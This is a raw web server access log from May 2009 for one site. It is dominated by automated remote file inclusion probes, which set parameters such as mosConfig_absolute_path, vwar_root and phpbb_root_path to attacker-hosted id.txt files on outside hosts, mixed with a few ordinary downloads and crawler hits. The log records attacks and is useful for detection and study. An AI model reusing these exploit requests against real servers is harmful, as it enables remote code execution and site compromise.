218.27.203.107 - - [20/May/2009:09:55:41 -0700] "GET /modules/xfsection/modify.php?dir_module=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:55:44 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:55:44 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:55:44 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:55:50 -0700] "GET /logs/access_080331.log%20%20//skin/zero_vote/error.php?dir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:56:24 -0700] "GET /logs/access_080331.log%20%20//skin/zero_vote/error.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:56:37 -0700] "GET /cgi-bin//classes/adodbt/sql.php?classes_dir=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:56:37 -0700] "GET /logs/access_080410.log/cgi-bin//classes/adodbt/sql.php?classes_dir=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:56:37 -0700] "GET /logs/cgi-bin//classes/adodbt/sql.php?classes_dir=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:56:38 -0700] "GET /logs/access_080331.log%20%20//skin/zero_vote/error.php?dir=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:56:39 -0700] "GET /logs/access_080410.log/cgi-bin//classes/adodbt/sql.php?classes_dir=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:56:39 -0700] "GET /cgi-bin//classes/adodbt/sql.php?classes_dir=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:56:39 -0700] "GET /logs/cgi-bin//classes/adodbt/sql.php?classes_dir=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:56:44 -0700] "GET /logs/access_090206.log/cgi-bin//classes/adodbt/sql.php?classes_dir=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:56:51 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:09:56:51 -0700] "GET /logs/access_081209.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:56:54 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:56:55 -0700] "GET /logs/access_090311.log//index.php?option=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:56:55 -0700] "GET /logs//index.php?option=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:56:55 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:56:58 -0700] "GET /logs/access_090206.log/cgi-bin//classes/adodbt/sql.php?classes_dir=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:57:02 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:57:06 -0700] "GET /modules/xfsection/modify.php?dir_module=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:57:06 -0700] "GET /logs/access_090311.log//index.php?option=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:57:06 -0700] "GET /logs//index.php?option=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:57:08 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:57:08 -0700] "GET /logs/access_080412.log%20%20//modules/xfsection/modify.php?dir_module=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:57:10 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:57:15 -0700] "GET /logs/access_080513.log%20%20//modules/xfsection/modify.php?dir_module=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:57:18 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
72.30.79.60 - - [20/May/2009:09:57:24 -0700] "GET /bikes/dteel/2008_02_08/ HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:57:38 -0700] "GET /skin/zero_vote/error.php?dir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:57:39 -0700] "GET /logs/access_071214.log%20%20//skin/zero_vote/error.php?dir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:57:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:57:44 -0700] "GET /index.php?option=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 41929 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:57:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:57:51 -0700] "GET /logs/access_080614.log//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:57:51 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:57:51 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:57:55 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:57:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:57:55 -0700] "GET /logs/access_080614.log//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:58:07 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
148.243.72.112 - - [20/May/2009:09:58:08 -0700] "GET /logs/errors.php?error=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
148.243.72.112 - - [20/May/2009:09:58:08 -0700] "GET /logs/access_090313.log/errors.php?error=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
148.243.72.112 - - [20/May/2009:09:58:08 -0700] "GET /errors.php?error=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
148.243.72.112 - - [20/May/2009:09:58:08 -0700] "GET /logs/access_081010.log/errors.php?error=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:58:33 -0700] "GET /index.php?option=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 41929 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:58:39 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:58:39 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:58:39 -0700] "GET /logs/access_080614.log//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:59:03 -0700] "GET /logs/access_090311.log%20%20//index.php?option=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:59:12 -0700] "GET /logs/access_090311.log%20%20//index.php?option=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:59:16 -0700] "GET /logs/access_090122.log%20%20//index.php?option=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:59:18 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:59:18 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:59:18 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:09:59:19 -0700] "GET /logs/access_080815.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:59:20 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:59:20 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:59:20 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:59:20 -0700] "GET /logs/access_080809.log//convert/mvcw.php?step=1&vwar_root=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:59:22 -0700] "GET /logs/access_090122.log%20%20//index.php?option=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:59:25 -0700] "GET /logs/access_080331.log%20%20//skin/zero_vote/error.php?dir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:59:27 -0700] "GET /logs/access_080809.log//convert/mvcw.php?step=1&vwar_root=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:59:47 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:10:00:00 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:10:00:01 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:00:04 -0700] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:10:00:07 -0700] "GET /logs/access_080423.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:00:09 -0700] "GET /logs/access_080127.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:00:12 -0700] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:10:00:13 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:00:13 -0700] "GET /logs/access_090326.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:00:13 -0700] "GET /logs/access_080111.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [20/May/2009:10:00:16 -0700] "GET /logs/access_080521.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [20/May/2009:10:00:16 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [20/May/2009:10:00:16 -0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://jasek.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:00:17 -0700] "GET /logs/access_080127.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:00:17 -0700] "GET /logs/access_080423.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:00:17 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.812" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:10:00:19 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:10:00:19 -0700] "GET /logs/access_090205.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:10:00:19 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:10:00:22 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:00:22 -0700] "GET /logs/access_080111.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:00:22 -0700] "GET /logs/access_090326.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:26 -0700] "GET /logs/access_080127.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:26 -0700] "GET /logs/access_090326.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:26 -0700] "GET /logs/access_080111.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:26 -0700] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:00:27 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:00:27 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.118.194.200 - - [20/May/2009:10:00:31 -0700] "GET /logs/access_080214.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [20/May/2009:10:00:31 -0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://jasek.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [20/May/2009:10:00:31 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:00:31 -0700] "GET /logs/access_080211.log//install3.php?database=none&cabsolute_path=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:00:31 -0700] "GET /logs/access_080211.log//install3.php?database=none&cabsolute_path=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:00:32 -0700] "GET /install3.php?database=none&cabsolute_path=http://giffarine.co.th/includes/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:00:32 -0700] "GET /install3.php?database=none&cabsolute_path=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:00:33 -0700] "GET /logs//install3.php?database=none&cabsolute_path=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:00:33 -0700] "GET /logs//install3.php?database=none&cabsolute_path=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:10:00:33 -0700] "GET /logs/access_090205.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:10:00:34 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:10:00:34 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:35 -0700] "GET /logs/access_080809.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:35 -0700] "GET /logs/access_090204.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:00:36 -0700] "GET /logs/access_080809.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:39 -0700] "GET /logs/access_080902.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [20/May/2009:10:00:39 -0700] "GET /logs/access_080521.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:00:43 -0700] "GET /logs/access_090204.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:44 -0700] "GET /logs/access_080219.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:44 -0700] "GET /logs/access_080803.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:49 -0700] "GET /logs/access_080226.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:49 -0700] "GET /logs/access_090210.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:54 -0700] "GET /logs/access_081116.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:54 -0700] "GET /logs/access_071230.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:10:00:54 -0700] "GET /logs/access_080730.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:10:00:55 -0700] "GET /logs/access_080809.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
